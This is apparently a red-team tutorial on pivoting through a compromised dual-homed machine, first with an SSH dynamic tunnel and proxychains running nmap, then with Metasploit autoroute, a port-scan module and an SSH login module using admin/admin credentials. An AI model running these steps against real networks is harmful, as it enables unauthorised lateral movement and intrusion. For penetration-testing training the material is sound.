Privilege Escalation: Pivoting
As with SSH Tunneling Pivoting is an essential skill set for a Red Teamer. When you find a machine that is duel homed it provides new access to another network. As a Red Teamer we want to take advantage of this and see what we can attack on that network to move further into the organization.
Pivoting at its base is fairly simple concept but to put it into action correctly is an entirely different situation. There are a lot of ways to pivot into another network to attack a machine. We will be showing 2 different ways, proxychains and meterpreter. Both of these have their advantages and disadvantages.
Our first look at pivoting will be manually with proxychains. Proxychains is a nicely built tool that allows you to run terminal commands over a SOCKS proxy. The Dynamic SSH Tunnel creates such a proxy for us.
First we will create the Dynamic SSH tunnel on port 4444.
ssh -D 4444 email@example.com
Now with this in place we will want to edit the proxychains config file to modify a few things.
# We want to comment out the following with # as it causes issue with nmap proxy_dns
# We want to modify the port for our socks4 proxy that was built by the SSH tunnel to match the port we used after -D
socks4 127.0.0.1 4444
With both of these saved we are able to use proxychains with nmap to scan the previously unknown network from our comprimised machine.
# Nmap Command proxychains nmap -Pn -sT 10.0.2.4
Its important to note that nmap will attempt to use ICMP to identify hosts. This is not allowed through proxychains as its a TCP based proxy setup. This is our limitation with proxychains. But we can see after running that command that we can now start attacking the remote system or network at will.
The next way we will pivot to the additonal network will be with a meterpreter session. We will assume inital access and fully comprimised the Windows machine and we want to use its duel homed nature to attack a machine with a known SSH set of credentials. We can do this entirely in metasploit!
First thing we want to do is used autoroute to setup the route based on our view of ipconfig on the host. We can see its a 10.0.2.0/24 based network. We will set autoroute to add this.
NOTE: THIS MUST BE DONE INSIDE OF THE METERPRETER SESSION YOU WANT TO HAVE THE ROUTE POINT TO!
# Adding the route run autoroute -s 10.0.2.0/24
# To view the route and see its ready
run autoroute -p
Now that the route is set we can just background the mterpreter shell with CTRL+Z and use another module to run a port scan!
# Use the TCP Port scan Module use auxiliary/scanner/portscan/tcp
# Setup the range/ports and threads
set RHOSTS 10.0.2.0/24
set PORTS 22,80
set THREADS 50
# Now we run
When we run this we can see that the host 10.0.2.5 has port 22 open. We know we have valid SSH credentials for the organization we want to try so lets try to get a meterpreter shell on the host.
We can use another metasploit module to connect and login with SSH.
# Module to load use auxiliary/scanner/ssh/ssh_login
# Set the parameters we want to use
set RHOSTS 10.0.2.5
set USERNAME admin
set PASSWORD admin
When we hit run we are able to see we have now 2 sessions active! If we connect to the next session we can see we are indeed on another system inside of the 10.0.2.0 network and using 192.168.1.11 as a pivot point!